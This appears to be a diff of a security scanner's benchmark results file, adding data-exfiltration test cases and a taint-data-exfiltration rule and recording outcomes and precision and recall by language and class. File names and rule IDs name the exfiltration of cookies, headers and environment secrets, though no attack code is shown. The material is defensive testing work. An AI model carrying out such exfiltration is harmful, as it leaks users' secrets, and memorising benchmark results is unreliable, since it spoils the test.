@ -3095,13 +3206,17 @@
"language": "java",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_file_level": "FP",
"outcome_rule_level": "FP",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"unexpected_rule_ids": [
"cfg-unguarded-sink"
],
"all_finding_ids": [
"cfg-unguarded-sink"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
@ -3321,14 +3436,14 @@
"vuln_class": "ssrf",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-unsanitised-flow (source 7:22)"
"outcome_rule_level": "FN",
"outcome_location_level": "FN",
"matched_rule_ids": [],
"unexpected_rule_ids": [
"taint-data-exfiltration (source 7:22)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-unsanitised-flow (source 7:22)"
"taint-data-exfiltration (source 7:22)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
@ -3358,13 +3473,17 @@
"language": "javascript",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_file_level": "FP",
"outcome_rule_level": "FP",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"unexpected_rule_ids": [
"cfg-unguarded-sink"
],
"all_finding_ids": [
"cfg-unguarded-sink"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
@ -3465,6 +3584,63 @@
"security_finding_count": 2,
"non_security_finding_count": 0
},
{
"case_id": "js-data_exfil-001",
"file": "javascript/data_exfil/exfil_fetch_cookie_body.js",
"language": "javascript",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 5:5)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 5:5)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "js-data_exfil-002",
"file": "javascript/data_exfil/exfil_fetch_external_destination.js",
"language": "javascript",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 5:5)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 5:5)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "js-data_exfil-003",
"file": "javascript/data_exfil/exfil_xhr_send_header.js",
"language": "javascript",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 5:5)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 5:5)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "js-destructure-sanitize-001",
"file": "javascript/safe/safe_object_destructure_sanitize.js",
@ -3558,13 +3734,17 @@
"language": "javascript",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_file_level": "FP",
"outcome_rule_level": "FP",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"unexpected_rule_ids": [
"cfg-unguarded-sink"
],
"all_finding_ids": [
"cfg-unguarded-sink"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
@ -3588,13 +3768,17 @@
"language": "javascript",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_file_level": "FP",
"outcome_rule_level": "FP",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"unexpected_rule_ids": [
"cfg-unguarded-sink"
],
"all_finding_ids": [
"cfg-unguarded-sink"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
@ -3678,13 +3862,17 @@
"language": "javascript",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_file_level": "FP",
"outcome_rule_level": "FP",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"unexpected_rule_ids": [
"cfg-unguarded-sink"
],
"all_finding_ids": [
"cfg-unguarded-sink"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
@ -3732,6 +3920,36 @@
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "js-safe-data_exfil-001",
"file": "javascript/safe/safe_data_exfil_sanitizer_wrap.js",
"language": "javascript",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "js-safe-data_exfil-002",
"file": "javascript/safe/safe_data_exfil_user_input_echo.js",
"language": "javascript",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "js-safe-parseInt-001",
"file": "javascript/safe/safe_parseInt.js",
@ -3882,11 +4100,11 @@
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-unsanitised-flow (source 5:5)"
"cfg-unguarded-sink"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-unsanitised-flow (source 5:5)"
"cfg-unguarded-sink"
],
"security_finding_count": 1,
"non_security_finding_count": 0
@ -4971,6 +5189,44 @@
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "py-data_exfil-001",
"file": "python/data_exfil/exfil_requests_post_env_dict.py",
"language": "python",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 14:25)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 14:25)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "py-data_exfil-002",
"file": "python/data_exfil/exfil_httpx_async_post_env.py",
"language": "python",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 12:15)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 12:15)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "py-deser-001",
"file": "python/deser/deser_pickle.py",
@ -5228,6 +5484,21 @@
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "py-safe-data_exfil-001",
"file": "python/safe/safe_data_exfil_user_input_echo.py",
"language": "python",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "py-safe-int-001",
"file": "python/safe/safe_int_cast.py",
@ -5425,6 +5696,25 @@
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "rb-data_exfil-001",
"file": "ruby/data_exfil/exfil_net_http_post_cookie.rb",
"language": "ruby",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 7:9)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 7:9)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "rb-interproc-001",
"file": "ruby/interprocedural/interproc_taint_propagation.rb",
@ -5504,6 +5794,21 @@
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "rb-safe-data_exfil-001",
"file": "ruby/safe/safe_data_exfil_user_input_echo.rb",
"language": "ruby",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "rs-auth-001",
"file": "rust/auth/actix_scoped_write_missing.rs",
@ -6179,6 +6484,26 @@
"security_finding_count": 1,
"non_security_finding_count": 2
},
{
"case_id": "rs-data_exfil-001",
"file": "rust/data_exfil/exfil_reqwest_form_env.rs",
"language": "rust",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 5:18)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"rs.quality.unwrap",
"taint-data-exfiltration (source 5:18)"
],
"security_finding_count": 1,
"non_security_finding_count": 1
},
{
"case_id": "rs-deser-001",
"file": "rust/deser/deser_serde_yaml.rs",
@ -6717,15 +7042,15 @@
"vuln_class": "ssrf",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-unsanitised-flow (source 4:15)"
"outcome_rule_level": "FN",
"outcome_location_level": "FN",
"matched_rule_ids": [],
"unexpected_rule_ids": [
"taint-data-exfiltration (source 4:15)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"rs.quality.unwrap",
"taint-unsanitised-flow (source 4:15)"
"taint-data-exfiltration (source 4:15)"
],
"security_finding_count": 1,
"non_security_finding_count": 1
@ -7495,6 +7820,44 @@
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "ts-data_exfil-001",
"file": "typescript/data_exfil/exfil_fetch_cookie_body.ts",
"language": "typescript",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 5:5)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 5:5)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "ts-data_exfil-002",
"file": "typescript/data_exfil/exfil_fetch_header_body.ts",
"language": "typescript",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 5:5)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 5:5)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "ts-iife-closure-001",
"file": "typescript/safe/safe_iife_closure_sanitizer.ts",
@ -8043,13 +8406,15 @@
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"cfg-unguarded-sink",
"cfg-unguarded-sink"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"cfg-unguarded-sink",
"cfg-unguarded-sink"
],
"security_finding_count": 1,
"security_finding_count": 2,
"non_security_finding_count": 0
},
{
@ -8193,29 +8558,29 @@
}
],
"aggregate_file_level": {
"tp": 225,
"fp": 1,
"tp": 238,
"fp": 7,
"fn_": 0,
"tn": 231,
"precision": 0.995575221238938,
"precision": 0.9714285714285714,
"recall": 1.0,
"f1": 0.9977827050997783
"f1": 0.9855072463768115
},
"aggregate_rule_level": {
"tp": 225,
"fp": 1,
"fn_": 0,
"tp": 236,
"fp": 7,
"fn_": 2,
"tn": 231,
"precision": 0.995575221238938,
"recall": 1.0,
"f1": 0.9977827050997783
"precision": 0.9711934156378601,
"recall": 0.9915966386554622,
"f1": 0.9812889812889812
},
"by_language": {
"c": {
"tp": 15,
"tp": 16,
"fp": 0,
"fn_": 0,
"tn": 15,
"tn": 16,
"precision": 1.0,
"recall": 1.0,
"f1": 1.0
@ -8230,31 +8595,31 @@
"f1": 1.0
},
"go": {
"tp": 25,
"tp": 26,
"fp": 1,
"fn_": 0,
"tn": 28,
"precision": 0.9615384615384616,
"tn": 29,
"precision": 0.9629629629629629,
"recall": 1.0,
"f1": 0.9803921568627451
"f1": 0.9811320754716981
},
"java": {
"tp": 19,
"fp": 0,
"fn_": 0,
"tn": 20,
"precision": 1.0,
"recall": 1.0,
"f1": 1.0
"tp": 20,
"fp": 2,
"fn_": 1,
"tn": 18,
"precision": 0.9090909090909091,
"recall": 0.9523809523809523,
"f1": 0.9302325581395349
},
"javascript": {
"tp": 19,
"fp": 0,
"tp": 22,
"fp": 4,
"fn_": 0,
"tn": 24,
"precision": 1.0,
"tn": 22,
"precision": 0.8461538461538461,
"recall": 1.0,
"f1": 1.0
"f1": 0.9166666666666666
},
"php": {
"tp": 18,
@ -8266,19 +8631,19 @@
"f1": 1.0
},
"python": {
"tp": 26,
"tp": 28,
"fp": 0,
"fn_": 0,
"tn": 28,
"tn": 29,
"precision": 1.0,
"recall": 1.0,
"f1": 1.0
},
"ruby": {
"tp": 19,
"tp": 20,
"fp": 0,
"fn_": 0,
"tn": 20,
"tn": 21,
"precision": 1.0,
"recall": 1.0,
"f1": 1.0
@ -8286,14 +8651,14 @@
"rust": {
"tp": 34,
"fp": 0,
"fn_": 0,
"fn_": 1,
"tn": 39,
"precision": 1.0,
"recall": 1.0,
"f1": 1.0
"recall": 0.9714285714285714,
"f1": 0.9855072463768115
},
"typescript": {
"tp": 32,
"tp": 34,
"fp": 0,
"fn_": 0,
"tn": 23,
@ -8357,6 +8722,15 @@
"recall": 1.0,
"f1": 1.0
},
"data_exfil": {
"tp": 13,
"fp": 0,
"fn_": 0,
"tn": 0,
"precision": 1.0,
"recall": 1.0,
"f1": 1.0
},
"deser": {
"tp": 8,
"fp": 0,
@ -8422,7 +8796,7 @@
},
"safe": {
"tp": 0,
"fp": 1,
"fp": 7,
"fn_": 0,
"tn": 231,
"precision": 0.0,
@ -8457,13 +8831,13 @@
"f1": 1.0
},
"ssrf": {
"tp": 28,
"tp": 26,
"fp": 0,
"fn_": 0,
"fn_": 2,
"tn": 0,
"precision": 1.0,
"recall": 1.0,
"f1": 1.0
"recall": 0.9285714285714286,
"f1": 0.962962962962963
},
"xss": {
"tp": 23,
@ -8477,31 +8851,31 @@
},
"by_confidence": {
">=High": {
"tp": 79,
"fp": 104,
"fn_": 146,
"tn": 128,
"precision": 0.43169398907103823,
"recall": 0.3511111111111111,
"f1": 0.3872549019607843
"tp": 74,
"fp": 106,
"fn_": 164,
"tn": 132,
"precision": 0.4111111111111111,
"recall": 0.31092436974789917,
"f1": 0.354066985645933
},
">=Low": {
"tp": 81,
"fp": 116,
"fn_": 144,
"tn": 116,
"precision": 0.41116751269035534,
"recall": 0.36,
"f1": 0.3838862559241706
"tp": 76,
"fp": 133,
"fn_": 162,
"tn": 105,
"precision": 0.36363636363636365,
"recall": 0.31932773109243695,
"f1": 0.34004474272930646
},
">=Medium": {
"tp": 81,
"fp": 116,
"fn_": 144,
"tn": 116,
"precision": 0.41116751269035534,
"recall": 0.36,
"f1": 0.3838862559241706
"tp": 76,
"fp": 123,
"fn_": 162,
"tn": 115,
"precision": 0.38190954773869346,
"recall": 0.31932773109243695,
"f1": 0.34782608695652173
}
}
}